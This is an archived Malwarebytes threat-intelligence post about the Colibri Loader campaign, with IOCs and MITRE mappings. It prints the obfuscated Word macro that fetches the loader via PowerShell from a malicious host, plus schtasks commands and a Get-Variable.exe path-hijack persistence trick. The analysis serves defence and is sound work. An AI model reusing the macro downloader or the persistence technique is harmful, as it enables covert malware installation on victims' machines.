{
	"id": "6c3ebcb3-f7cf-450f-8a9e-eb87d453a850",
	"created_at": "2026-04-06T00:12:03.144677Z",
	"updated_at": "2026-04-10T03:20:38.9201Z",
	"deleted_at": null,
	"sha1_hash": "c6fde7d56951855a622e15cfe551135b0758da4d",
	"title": "Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1524916,
	"plain_text": "Colibri Loader combines Task Scheduler and PowerShell in clever\r\npersistence technique\r\nBy Mark Stockley\r\nPublished: 2022-04-04 · Archived: 2026-04-05 22:01:48 UTC\r\nApril 5, 2022\r\nThis blog post was authored by Ankur Saini, with contributions from Hossein Jazi and Jérôme Segura\r\n(2022-04-07): Added MITRE ATT\u0026CK mappings\r\n(2022-04-07): Changed the name of the final payload from Vidar to Mars Stealer\r\nColibri Loader is a relatively new piece of malware that first appeared on underground forums in August 2021 and\r\nwas advertised to “people who have large volumes of traffic and lack of time to work out the material“. As it\r\nnames suggests, it is meant to deliver and manage payloads onto infected computers.\r\nOur Threat Intelligence Team recently uncovered a new Colibri Loader campaign delivering the Mars Stealer as\r\nfinal payload. There is already published material about Colibri by CloudSekand independent researchers. Since\r\nmost of the details about the bot have been covered, we decided to highlight a persistence technique we haven’t\r\nseen before.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\r\nPage 1 of 5\n\nArticle continues below this ad.\r\nCampaign attack chain\r\nThe attack starts with a malicious Word document deploying Colibri bot that then delivers the Mars Stealer. The\r\ndocument contacts a remote server at (securetunnel[.]co) to load a remote template named trkal0.dot that contacts\r\na malicious macro. This attack is known as remote template injection.\r\nThe macro enables PowerShell to download the final payload (Colibri Loader) as setup.exe:\r\nPrivate Sub Document_Open()\r\nzgotwed=\"C:UsersPublicsetup.ex`e\"\r\nn87lcy4=Replace(\"new:72Cs19e4ts4D\", \"s19e4ts\", \"2\")\r\nSet hu9v0dd=GetObject(n87lcy4 \u0026 \"D5-D70A-438B-8A42-984\" \u0026 CLng(\"1.8\") \u0026 \"4B88AFB\" \u0026 CInt(\"8.1\"))\r\nhu9v0dd.exec \"cm\" \u0026 \"d /c powers^hell -w hi Start-BitsTransfer -Sou htt`ps://securetunnel\r\n.co/connection/setup.e`xe -Dest \" \u0026 zgotwed \u0026 \";\r\nEnd Sub\r\nAbusing PowerShell for Persistence\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\r\nPage 2 of 5\n\nColibri leverages PowerShell in a unique way to maintain persistence after a reboot. Depending on the Windows\r\nversion, Colibri drops its copy in %APPDATA%LocalMicrosoftWindowsApps and names it Get-Variable.exe for\r\nWindows 10 and above, while for lower versions it drops it in %DOCUMENTS%/WindowsPowerShell named as\r\ndllhost.exe\r\nOn Windows 7, it creates a scheduled task using the following command:\r\nschtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr\r\n“C:UsersadminDocumentsWindowsPowerShelldllhost.exe“\r\nOn Windows 10 and above, it creates a scheduled task using the following command:\r\nschtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “powershell.exe -\r\nwindowstyle hidden“\r\nIn the first scenario (Win7), we see a task pointing to the path of Colibri Loader. However, in the second we see an\r\nodd task to execute PowerShell with a hidden window. This is what we believe is a new persistence technique\r\nemployed by the malware author.\r\nAs mentioned earlier, it drops the file with the name Get-Variable.exe in the WindowsApps directory. It so\r\nhappens that Get-Variableis a valid PowerShell cmdlet(a cmdlet is a lightweight command used in the Windows\r\nPowerShell environment) which is used to retrieve the value of a variable in the current console.\r\nAdditionally, WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable\r\ncommand is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and\r\nexecutes the malicious binary instead of looking for the PowerShell cmdlet.\r\nWe reproduced this technique using the calculator to show how an adversary can easily achieve persistence\r\ncombining a scheduled task and any payload (as long as it is called Get-Variable.exe and placed in the proper\r\nlocation):\r\nA search on VirusTotal for the file name Get-Variable.exeindicates that the first malicious fileuploaded to the\r\nplatform happened last August, which matches with the time that Colibri appeared on XSS underground forums.\r\nThat sample has the same networking features as Colibri which helps us ascertain with more confidence that the\r\ntechnique was debuted by Colibri.\r\nConclusion\r\nColibri is still in its infancy but it already offers many features for attackers and slowly seems to be gaining\r\npopularity. The persistence technique we outlined in this blog is simple but efficient and does not appear to be\r\nknown.\r\nMalwarebytes users are protected against this attack thanks to our Anti-Exploit layer:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\r\nPage 3 of 5\n\nIOCs\r\nWord Document\r\n666268641a7db3b600a143fff00a063e77066ad72ac659ebc77bb5d1acd5633d\r\nsetup.exe(Colibri)\r\n54a790354dbe3ab90f7d8570d6fc7eb80c024af69d1db6d0f825c094293c5d77\r\ninstall.exe(Mars)\r\nb92f4b4684951ff2e5abdb1280e6bff80a14b83f25e4f3de39985f188d0f3aad\r\nMITRE ATT\u0026CK(related to persistence technique)\r\nTechnique Description Usage\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nschtasks.exe /create /tn\r\nCOMSurrogate /st 00:00 /du\r\n9999:59 /sc once /ri 1 /f /tr\r\n“powershell.exe -windowstyle\r\nhidden”\r\nT1564.003\r\nHide Artifacts: Hidden\r\nWindow\r\npowershell.exe -windowstyle\r\nhidden\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\npowershell.exe -windowstyle\r\nhidden\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nGet-Variable.exe\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\r\nPage 4 of 5\n\nT1574.008\r\nHijack Execution Flow: Path\r\nInterception by Search Order\r\nHijacking\r\nGet-Variable.exe\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistenc\r\ne-technique/\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/"
	],
	"report_names": [
		"colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique"
	],
	"threat_actors": [],
	"ts_created_at": 1775434323,
	"ts_updated_at": 1775791238,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c6fde7d56951855a622e15cfe551135b0758da4d.pdf",
		"text": "https://archive.orkl.eu/c6fde7d56951855a622e15cfe551135b0758da4d.txt",
		"img": "https://archive.orkl.eu/c6fde7d56951855a622e15cfe551135b0758da4d.jpg"
	}
}